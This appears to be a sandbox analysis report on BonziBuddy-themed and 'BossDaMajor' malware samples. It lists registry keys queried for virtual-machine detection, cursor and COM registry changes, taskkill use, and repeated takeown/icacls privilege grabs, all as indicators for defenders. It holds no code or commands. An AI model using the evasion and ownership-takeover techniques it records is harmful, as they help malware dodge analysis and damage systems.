Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Checks SCSI registry key(s) 3 TTPs 26 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Capabilities	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002	explorer.exe

Checks processor information in registry 2 TTPs 21 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SearchUI.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	SearchUI.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2456	taskkill.exe

Modifies Control Panel 4 IoCs

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Control Panel\Cursors\Arrow = "C:\\Program Files\\mrsmajor\\def_resource\\skullcur.cur"	wscript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Control Panel\Cursors\AppStarting = "C:\\Program Files\\mrsmajor\\def_resource\\skullcur.cur"	wscript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Control Panel\Cursors\Hand = "C:\\Program Files\\mrsmajor\\def_resource\\skullcur.cur"	wscript.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Control Panel\Cursors	wscript.exe

Modifies Internet Explorer settings 1 TTPs 5 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Internet Explorer\GPU	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Internet Explorer\Toolbar	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1"	explorer.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C74190B6-8589-11D1-B16A-00C0F0283628}\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4}	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{065E6FD1-1BF9-11D2-BAE8-00104B9E0792}\3.0\0\win32	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00E212A2-E66D-11CD-836C-0000C0C14E92}\ = "ISSDay"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D45FD31B-5C6E-11D1-9EC1-00C04FD7081F}\ProgID	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A7B93C8B-7B81-11D0-AC5F-00C04FD97575}\ = "IAgentPropertySheet"	AgentSvr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{53FA8D41-2CDD-11D3-9DD0-D3CD4078982A}\MiscStatus\1\ = "139665"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EE11629C-36DF-11D3-9DD0-89D6DBBBA800}\verb	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32\ = "C:\\Program Files (x86)\\BonziBuddy432\\MSWINSCK.OCX"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E8671A88-E5DD-11CD-836C-0000C0C14E92}\Implemented Categories\{7DD95801-9882-11CF-9FA9-00AA006C42C4}	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A7B93C85-7B81-11D0-AC5F-00C04FD97575}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	AgentSvr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D6589123-FC70-11D0-AC94-00C04FD97575}\2.0\0\win32\ = "C:\\Windows\\msagent\\AgentSvr.exe\\2"	AgentSvr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D45FD31B-5C6E-11D1-9EC1-00C04FD7081F}\InprocServer32\ThreadingModel = "Apartment"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\ActiveSkin.ComTransitions\CLSID\ = "{3C6D21D6-7470-4555-A8FB-6C2292B39C46}"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{35053A21-8589-11D1-B16A-00C0F0283628}\ProxyStubClsid32	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C74190B4-8589-11D1-B16A-00C0F0283628}\TypeLib\Version = "2.0"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DD9DA665-8594-11D1-B16A-00C0F0283628}	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{065E6FD2-1BF9-11D2-BAE8-00104B9E0792}\ProxyStubClsid32	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{CDA1CA02-8B5D-11D0-9BC0-0000C0F04C96}\ = "ISSReturnShort"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{065E6FD2-1BF9-11D2-BAE8-00104B9E0792}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A45DB4F-BD0D-11D2-8D14-00104B9E072A}\Implemented Categories\{0DE86A57-2BAA-11CF-A229-00AA003D7352}	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DECC98E1-EC4E-11D2-93E5-00104B9E078A}\TypeLib\Version = "2.0"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B8F2846E-CE36-11D0-AC83-00C04FD97575}\MiscStatus\ = "0"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{83C2D7A0-0DE6-11D3-9DCF-9423F1B2561C}\TypeLib\Version = "1.0"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BDD1F053-858B-11D1-B16A-00C0F0283628}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\BonziBUDDY.clsRegistration\Clsid	BonziBDY_4.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B8F2846E-CE36-11D0-AC83-00C04FD97575}	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{37DEB788-2D9B-11D3-9DD0-C423E6542E10}\TypeLib	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{065E6FEA-1BF9-11D2-BAE8-00104B9E0792}\ProxyStubClsid32	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MSComctlLib.Slider\CurVer\ = "MSComctlLib.Slider.2"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{66833FE9-8583-11D1-B16A-00C0F0283628}	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1EF6BEC0-E669-11CD-836C-0000C0C14E92}\TypeLib\Version = "1.0"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.lwv	regsvr32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon	wscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{972DE6B5-8B09-11D2-B652-A1FD6CC34260}\1.0\FLAGS	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{53FA8D46-2CDD-11D3-9DD0-D3CD4078982A}	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2C247F24-8591-11D1-B16A-00C0F0283628}\TypeLib\Version = "2.0"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8E3867AA-8586-11D1-B16A-00C0F0283628}\ProxyStubClsid32	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DECC98E1-EC4E-11D2-93E5-00104B9E078A}	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D45FD31B-5C6E-11D1-9EC1-00C04FD7081F}\TypeLib	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{22DF5084-12BC-4C98-8044-4FAD06F4119A}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	BonziBDY_4.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\ActiveSkin.SkinForm.1\CLSID\ = "{972DE6C2-8B09-11D2-B652-A1FD6CC34260}"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{53FA8D4A-2CDD-11D3-9DD0-D3CD4078982A}\InprocServer32\ = "C:\\PROGRA~2\\BONZIB~1\\ACTIVE~1.OCX"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66833FE7-8583-11D1-B16A-00C0F0283628}\TypeLib\ = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{14E27A73-69F0-11CE-9425-0000C0C14E92}\TypeLib	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8B77181C-D3EF-11D1-8500-00C04FA34A14}\ProxyStubClsid32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6BA90C00-3910-11D1-ACB3-00C04FD97575}\ProxyStubClsid32	AgentSvr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{065E6FD2-1BF9-11D2-BAE8-00104B9E0792}\TypeLib\ = "{065E6FD1-1BF9-11D2-BAE8-00104B9E0792}"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\BonziBUDDY.clsAddressBook\Clsid\ = "{F4900F8D-055F-11D4-8F9B-00104BA312D6}"	BonziBDY_4.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{53FA8D48-2CDD-11D3-9DD0-D3CD4078982A}\TypeLib\Version = "1.0"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{920FF31F-CA25-451A-9738-3444FC206BCC}\ProxyStubClsid32	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{29D9184E-BF09-4F13-B356-22841635C733}\1.0\0\win32\ = "C:\\Program Files (x86)\\BonziBuddy432\\BonziCheckers.ocx"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{35053A22-8589-11D1-B16A-00C0F0283628}\Implemented Categories\{0DE86A53-2BAA-11CF-A229-00AA003D7352}	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66833FE4-8583-11D1-B16A-00C0F0283628}\TypeLib\ = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BDD1F049-858B-11D1-B16A-00C0F0283628}\TypeLib\ = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C4D7E3C7-3C26-4052-A993-71E500EA8C05}\InprocServer32\ = "C:\\PROGRA~2\\BONZIB~1\\ACTIVE~1.OCX"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{065E6FDF-1BF9-11D2-BAE8-00104B9E0792}\Implemented Categories\{40FC6ED5-2438-11CF-A3DB-080036F12502}	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6B976285-3692-11D0-9B8A-0000C0F04C96}\TypeLib\ = "{065E6FD1-1BF9-11D2-BAE8-00104B9E0792}"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A7B93C89-7B81-11D0-AC5F-00C04FD97575}\TypeLib\Version = "2.0"	AgentSvr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{D6589121-FC70-11D0-AC94-00C04FD97575}\ = "IAgentExt"	AgentSvr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\ActiveSkin.ComTransitions.1	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{322982E0-0855-11D3-9DCF-DDFB3AB09E18}\TypeLib\ = "{972DE6B5-8B09-11D2-B652-A1FD6CC34260}"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{53FA8D49-2CDD-11D3-9DD0-D3CD4078982A}\TypeLib	BonziBuddy432.exe

NTFS ADS 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\Downloads\Bonzi.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Bonzify.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\BossDaMajor.exe:Zone.Identifier	firefox.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4272	explorer.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
5968	Bonzify.exe
5968	Bonzify.exe
5968	Bonzify.exe
5968	Bonzify.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
4272	explorer.exe
1400	rundll32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3472	firefox.exe
Token: SeDebugPrivilege	3472	firefox.exe
Token: SeDebugPrivilege	3472	firefox.exe
Token: SeDebugPrivilege	3472	firefox.exe
Token: SeDebugPrivilege	3472	firefox.exe
Token: SeDebugPrivilege	3472	firefox.exe
Token: 33	5164	AgentSvr.exe
Token: SeIncBasePriorityPrivilege	5164	AgentSvr.exe
Token: 33	2988	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2988	AUDIODG.EXE
Token: 33	5164	AgentSvr.exe
Token: SeIncBasePriorityPrivilege	5164	AgentSvr.exe
Token: 33	5164	AgentSvr.exe
Token: SeIncBasePriorityPrivilege	5164	AgentSvr.exe
Token: 33	5164	AgentSvr.exe
Token: SeIncBasePriorityPrivilege	5164	AgentSvr.exe
Token: 33	5164	AgentSvr.exe
Token: SeIncBasePriorityPrivilege	5164	AgentSvr.exe
Token: 33	5164	AgentSvr.exe
Token: SeIncBasePriorityPrivilege	5164	AgentSvr.exe
Token: 33	5164	AgentSvr.exe
Token: SeIncBasePriorityPrivilege	5164	AgentSvr.exe
Token: SeDebugPrivilege	1336	firefox.exe
Token: SeDebugPrivilege	1336	firefox.exe
Token: 33	5164	AgentSvr.exe
Token: SeIncBasePriorityPrivilege	5164	AgentSvr.exe
Token: 33	5164	AgentSvr.exe
Token: SeIncBasePriorityPrivilege	5164	AgentSvr.exe
Token: 33	5164	AgentSvr.exe
Token: SeIncBasePriorityPrivilege	5164	AgentSvr.exe
Token: SeDebugPrivilege	2456	taskkill.exe
Token: SeTakeOwnershipPrivilege	5000	takeown.exe
Token: SeTakeOwnershipPrivilege	2172	takeown.exe
Token: SeTakeOwnershipPrivilege	4084	takeown.exe
Token: SeTakeOwnershipPrivilege	1332	takeown.exe
Token: SeTakeOwnershipPrivilege	4640	takeown.exe
Token: SeTakeOwnershipPrivilege	3720	takeown.exe
Token: SeTakeOwnershipPrivilege	4552	takeown.exe
Token: SeTakeOwnershipPrivilege	6140	takeown.exe
Token: SeTakeOwnershipPrivilege	4960	takeown.exe
Token: SeTakeOwnershipPrivilege	6008	takeown.exe
Token: SeTakeOwnershipPrivilege	2456	takeown.exe
Token: SeTakeOwnershipPrivilege	4660	takeown.exe
Token: 33	2240	AgentSvr.exe
Token: SeIncBasePriorityPrivilege	2240	AgentSvr.exe
Token: SeTakeOwnershipPrivilege	4848	takeown.exe
Token: SeTakeOwnershipPrivilege	1776	takeown.exe
Token: SeTakeOwnershipPrivilege	4272	takeown.exe
Token: SeTakeOwnershipPrivilege	5256	takeown.exe
Token: SeTakeOwnershipPrivilege	5152	takeown.exe
Token: SeTakeOwnershipPrivilege	4556	takeown.exe
Token: SeTakeOwnershipPrivilege	1900	takeown.exe
Token: SeTakeOwnershipPrivilege	5780	takeown.exe
Token: SeTakeOwnershipPrivilege	5776	takeown.exe
Token: SeTakeOwnershipPrivilege	2836	takeown.exe
Token: SeTakeOwnershipPrivilege	5204	takeown.exe
Token: SeTakeOwnershipPrivilege	1560	takeown.exe
Token: SeTakeOwnershipPrivilege	2680	takeown.exe
Token: SeTakeOwnershipPrivilege	5832	takeown.exe
Token: SeTakeOwnershipPrivilege	4408	takeown.exe
Token: SeTakeOwnershipPrivilege	1716	takeown.exe
